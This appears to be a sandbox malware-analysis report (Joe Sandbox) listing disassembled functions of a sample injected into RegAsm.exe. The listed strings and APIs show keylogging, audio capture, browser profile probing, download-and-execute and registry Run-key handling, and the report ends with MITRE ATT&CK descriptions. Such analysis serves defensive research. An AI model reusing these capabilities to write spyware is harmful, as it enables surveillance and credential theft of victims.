Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF

Function 0043C0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043C11E
_free.LIBCMT ref: 0043C144

Strings

s, xrefs: 0043C119, 0043C126, 0043C13F, 0043C14C, 0043C172

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: s
API String ID: 269201875-3006692533
Opcode ID: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
Instruction ID: 33e0fe0941749f3336bda6be3c0f63978f5ebcf9e4adac19a04b7d23778c801b
Opcode Fuzzy Hash: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
Instruction Fuzzy Hash: A511D371A002104BEF209F39AC81B567294A714734F14162BF929EA2D5D6BCD8815F89

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

| , xrefs: 0041B53C
%02i:%02i:%02i:%03i , xrefs: 0041B51E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C

Strings

hYG, xrefs: 0041AD46
alarm.wav, xrefs: 0041AD27

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Function 00449A5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
_free.LIBCMT ref: 00449ACC

Strings

s, xrefs: 00449A86, 00449A9C, 00449AB2, 00449AC4, 00449AD2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: s
API String ID: 1836352639-3006692533
Opcode ID: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
Instruction ID: d8668749b8f053f3b87a5db4b07a71174a174bb0d30b2be9e7ca2d93a8738622
Opcode Fuzzy Hash: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
Instruction Fuzzy Hash: 491161315002149FE720DFA9D846B5D73B0FB04315F10455AE959AB2E6CBBCEC82DB0D

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
waveInAddBuffer.WINMM(?,00000020), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32

Strings

JD, xrefs: 00448B29, 00448B16
IsValidLocaleName, xrefs: 00448AF7, 00448B01

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$JD
API String ID: 1901932003-2234456777
Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040C4E0
UserProfile, xrefs: 0040C4CA

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C559

Strings

UserProfile, xrefs: 0040C52D
\AppData\Local\Microsoft\Edge\, xrefs: 0040C543

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC

Strings

\Opera Software\Opera Stable\, xrefs: 0040C5A6
AppData, xrefs: 0040C590

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

[AltL], xrefs: 0040B68D
[AltR], xrefs: 0040B681

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E

Strings

uD, xrefs: 0044ED05

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: uD
API String ID: 0-2547262877
Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

open, xrefs: 004161A2
!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlR], xrefs: 0040B6C2
[CtrlL], xrefs: 0040B6D3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Function 0043C1C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC

Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E

DeleteCriticalSection.KERNEL32(0073E6C0), ref: 0043C1F1
_free.LIBCMT ref: 0043C205

Strings

s, xrefs: 0043C1D7, 0043C1E4, 0043C20A

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$CriticalDeleteSection
String ID: s
API String ID: 1906768660-3006692533
Opcode ID: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
Instruction ID: 43a050214315618beeb9c81765b0605937ca417edd614e55d144c525631042cd
Opcode Fuzzy Hash: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
Instruction Fuzzy Hash: 69E04F329145108FEB717F6AFD8595A73E49B4D325B11082FFC0DA316ACA6DAC809B8D

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

,kG, xrefs: 00410F04
0kG, xrefs: 00410F31

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00413A31
RegDeleteValueW.ADVAPI32 ref: 00413A45

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668

Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1

Strings

pth_unenc, xrefs: 0040B869

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8

Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Strings

pth_unenc, xrefs: 00412850

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59

Function 0044F30A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0044F30A
GetCommandLineW.KERNEL32 ref: 0044F315

Strings

82o, xrefs: 0044F310

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: 82o
API String ID: 3253501508-3846456706
Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08

Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
GetLastError.KERNEL32 ref: 00440D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759

Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
